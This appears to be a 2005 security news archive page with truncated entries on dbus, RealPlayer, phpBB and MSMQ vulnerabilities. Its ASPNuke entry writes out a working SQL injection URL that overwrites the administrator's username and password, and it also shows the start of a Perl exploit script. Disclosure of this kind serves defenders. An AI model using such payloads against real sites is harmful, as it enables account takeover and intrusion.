Entries from June 2005

dbus vulnerability

Date June 30, 2005

===========================================================
Ubuntu Security Notice USN-144-1 June 27, 2005
dbus vulnerability
CAN-2005-0201
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
The following packages are affected:
dbus-1
The problem can be corrected by upgrading the affected package to
version 0.22-1ubuntu2.1. You have to restart your Gnome session (i.e.
log [...]

aspnuke is vulnerable to sql injection

Date June 30, 2005

*******description*********
aspnuke is web portal system written in asp .
site : www.aspnuke.com
********POC************
It’s possible to inject htttp://host/module/article/article/article.asp?articleid=1′
for example you can change the admin username and password with this querry :
http://host/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password=’bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c’ , username=’trapset’%20where%20userID=1%20–
this will change both username and password to trapset
and then you can login to the admin’s conntrol panel from www.example.com/module/admin
********************
remember aspnuke is quiet diffrent from asp-nuke
********************

This [...]

High Risk Vulnerability in RealPlayer for Windows

Date June 30, 2005

John Heasman of NGSSoftware has discovered a high risk vulnerability in
RealPlayer for Windows.
Versions affected include:
RealPlayer 10.5 (6.0.12.1040-1069)
RealPlayer 10
RealOne Player v2
RealOne Player v1
RealPlayer 10.5 (6.0.12.1212) is NOT affected.
The flaw permits the overwriting of a local file or execution of an ActiveX
control via a malformed MP3 file.
The patch can be downloaded from
http://service.real.com/help/faq/security/050623_player/EN/
NGSSoftware are going to withhold details [...]

phpBB 2.0.16 released

Date June 30, 2005

Hi everyone,
phpBB Group announces the release of phpBB 2.0.16. This release addresses
some bugfixes and one critical security issue. To fix this, please apply
the following change: In viewtopic.php
Find:
$message = str_replace(‘”‘, ‘”‘,
substr(@preg_replace(‘#(>(((?>([^>< ]+|(?R)))*)’ . $message . ‘< '), 1, -1));
Replace with:
$message = str_replace('"', '"',
substr(@preg_replace('#(>(((?>([^>< ]+|(?R)))*)’ . $message .
‘< ‘), 1, -1));
We urge you to update [...]

SQL Injection Exploit for ASPNuke <= 0.80

Date June 30, 2005

#!/usr/bin/perl -w
#
# SQL Injection Exploit for ASPNuke < = 0.80
# This exploit retrieve the username of the administrator of the board and
his password crypted in SHA256
# Related advisory:
http://www.securityfocus.com/archive/1/403479/30/0/threaded
# Discovered and Coded by Alberto Trivero
use LWP::Simple;
print “\n\t===============================\n”;
print “\t= Exploit for ASPNuke

Message Queuing Buffer Overflow Universal Exploit

Date June 30, 2005

/* HOD-ms05017-msmq-expl.c: 2005-06-28: PUBLIC v.0.3
*
* Copyright (c) 2004-2005 houseofdabus.
*
* (MS05-017) Message Queuing Buffer Overflow Vulnerability
* Universal Exploit
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* [ http://www.livejournal.com/users/houseofdabus
* ---------------------------------------------------------------------
* Systems [...]